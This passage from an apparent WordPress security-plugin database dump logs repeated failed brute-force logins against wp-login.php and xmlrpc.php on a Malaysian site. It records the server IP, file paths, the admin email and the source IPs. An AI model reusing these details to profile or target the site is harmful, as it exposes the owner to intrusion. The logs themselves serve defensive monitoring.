21:24:12',18219232,19518376,'https://bintara.com.my/xmlrpc.php',1,0,'136.144.210.48'),(23697,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.20.207\";s:11:\"REMOTE_PORT\";s:5:\"46574\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXRDIg4WJcYRwD-bjCNRswAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567900450.577\";s:12:\"REQUEST_TIME\";s:10:\"1567900450\";}}','notice','2019-09-07 23:54:11','2019-09-07 23:54:10',17702104,19194464,'https://bintara.com.my/wp-login.php',1,0,'157.230.20.207'),(23698,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.20.207\";s:11:\"REMOTE_PORT\";s:5:\"47000\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXRDJYjnkVx6k5bJrKjEMgAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567900453.5758\";s:12:\"REQUEST_TIME\";s:10:\"1567900453\";}}','notice','2019-09-07 23:54:15','2019-09-07 23:54:13',18216504,19515896,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.20.207'),(23699,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"54926\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXSNy16hXliZLccdX5b7egAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567919563.3757\";s:12:\"REQUEST_TIME\";s:10:\"1567919563\";}}','notice','2019-09-08 05:12:44','2019-09-08 05:12:43',17704536,19191912,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(23700,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"54926\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXSNy16hXliZLccdX5b7egAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567919563.3757\";s:12:\"REQUEST_TIME\";s:10:\"1567919563\";}}','notice','2019-09-08 05:12:45','2019-09-08 05:12:43',17866512,19191912,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(23701,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"55436\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXSNzojnkVx6k5bJrKjQ0wAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567919566.4733\";s:12:\"REQUEST_TIME\";s:10:\"1567919566\";}}','notice','2019-09-08 05:12:48','2019-09-08 05:12:46',18212136,19508392,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(23702,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"68.66.197.196\";s:11:\"REMOTE_PORT\";s:5:\"46624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXSvDl6hXliZLccdX5YSLwAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567928078.6924\";s:12:\"REQUEST_TIME\";s:10:\"1567928078\";}}','notice','2019-09-08 07:34:40','2019-09-08 07:34:39',17699376,19190016,'https://bintara.com.my/wp-login.php',1,0,'68.66.197.196'),(23703,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"68.66.197.196\";s:11:\"REMOTE_PORT\";s:5:\"47162\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXSvEf3alkH3man4W2T-zAAAARM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567928081.9238\";s:12:\"REQUEST_TIME\";s:10:\"1567928081\";}}','notice','2019-09-08 07:34:43','2019-09-08 07:34:42',18214256,19513160,'https://bintara.com.my/xmlrpc.php',1,0,'68.66.197.196'),(23704,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.240.15\";s:11:\"REMOTE_PORT\";s:5:\"37506\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXTL8YjnkVx6k5bJrKjcsgAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567935473.2467\";s:12:\"REQUEST_TIME\";s:10:\"1567935473\";}}','notice','2019-09-08 09:37:54','2019-09-08 09:37:53',17705248,19189848,'https://bintara.com.my/wp-login.php',1,0,'188.165.240.15'),(23705,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.240.15\";s:11:\"REMOTE_PORT\";s:5:\"37506\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXTL8YjnkVx6k5bJrKjcsgAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567935473.2467\";s:12:\"REQUEST_TIME\";s:10:\"1567935473\";}}','notice','2019-09-08 09:37:55','2019-09-08 